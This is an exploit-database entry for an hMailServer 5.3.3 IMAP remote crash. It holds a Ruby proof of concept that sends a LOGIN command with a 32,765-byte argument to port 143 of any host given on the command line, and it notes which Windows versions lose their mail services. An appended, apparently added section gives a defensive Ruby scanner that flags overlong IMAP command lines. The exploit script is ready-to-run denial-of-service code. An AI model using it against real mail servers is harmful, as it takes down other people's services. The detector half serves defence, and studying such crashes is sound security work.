
hMailServer 5.3.3 - IMAP Remote Crash (PoC)

Author: John Smith
type: dos
platform: windows
port: 
date_added: 2012-10-28 
date_updated: 2012-10-28 
verified: 1 
codes: OSVDB-86769 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt22500/screen-shot-2012-10-28-at-102142-am.png 
application_url: http://www.exploit-db.comhMailServer-5.3.3-B1879.exe

# Exploit Title: hMailServer 5.3.3 IMAP Remote Crash PoC
# Date: 10/27/2012
# Vendor Homepage: http://hmailserver.com
# Software Link: http://www.hmailserver.com/index.php?page=background_download_file&downloadid=207
# Version: hMailServer 5.3.3 - Build 1879
# Tested on:
#	- hMailServer 5.3.3 with default settings
#	- Reliable corruption makes IMAP service inaccessible on WIN XP SP2 and WIN 2K3R2 SP2
#	- Unreliable corruption makes all services (SMTP, IMAP, and POP) inaccessible on WIN 2K8R2 SP1
#
# Note: Disable "Auto-ban" in the hMailServer Admin console if performing additional fuzzing.

#!/usr/bin/ruby

require 'socket'

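# Target host is the first command-line argument; IMAP listens on TCP 143.
s = TCPSocket.open(ARGV[0], 143)

# LOGIN command whose first argument is 32765 bytes long.
cmd = "a LOGIN "
address = "A" * 32765
password = " AAAAAAAA\r\n"
logout = "a LOGOUT\r\n"

# Assemble LOGIN and LOGOUT so they go out in a single write.
pkt = cmd
pkt << address
pkt << password
pkt << logout

s.write(pkt)

# Print each response line until the server closes the connection.
while resp = s.gets
	p resp
end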

s.close
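
A defensive counterpart to the PoC above, as an added example that is not part of the original advisory or of hMailServer: a bounded-memory scanner that flags IMAP command lines longer than an assumed 8192-octet limit as soon as the limit is crossed. `ImapLineGuard`, `MAX_LINE`, `HEAD_KEEP` and `scan_sample` are hypothetical names, and the sample stream is constructed.

```ruby
# Added example, not part of the original PoC. MAX_LINE and HEAD_KEEP are assumed
# policy values, not hMailServer settings. IMAP literals ({n}) are not parsed.
MAX_LINE  = 8192
HEAD_KEEP = 64

class ImapLineGuard
  attr_reader :alerts
  def initialize(max_line: MAX_LINE)
    @max_line = max_line
    @alerts = []
    reset_line
  end

  # Feed chunks exactly as read from the socket; only HEAD_KEEP bytes per line are kept.
  def feed(chunk)
    chunk.each_byte do |b|
      next if b == 0x0D                        # CR is not counted
      if b == 0x0A                             # LF ends the command line
        @current[:length] = @len if @current   # final size of a flagged line
        reset_line
      else
        @len += 1
        @head << b if @head.bytesize < HEAD_KEEP
        flag if @len > @max_line && @current.nil?
      end
    end
    self
  end

  private
  def reset_line
    @head, @len, @current = String.new, 0, nil
  end

  # Fires when the limit is crossed, before CRLF arrives, so nothing large is buffered.
  def flag
    tag, command = @head.split(" ", 3)
    @current = { tag: tag, command: command.to_s.upcase, length: @len }
    @alerts << @current
  end
end

# Constructed sample: one normal command, then a LOGIN line shaped like the PoC's.
SAMPLE = "a1 CAPABILITY\r\na LOGIN " + "A" * 32765 + " AAAAAAAA\r\na LOGOUT\r\n"
def scan_sample(chunk_size = 1460)
  guard = ImapLineGuard.new
  SAMPLE.bytes.each_slice(chunk_size) { |part| guard.feed(part.pack("C*")) }
  guard.alerts
end
p scan_sample if __FILE__ == $0
```

Because the alert is raised before the terminating CRLF is seen, the same logic can sit in a proxy or sensor in front of the IMAP port and close the connection without holding the oversized line in memory.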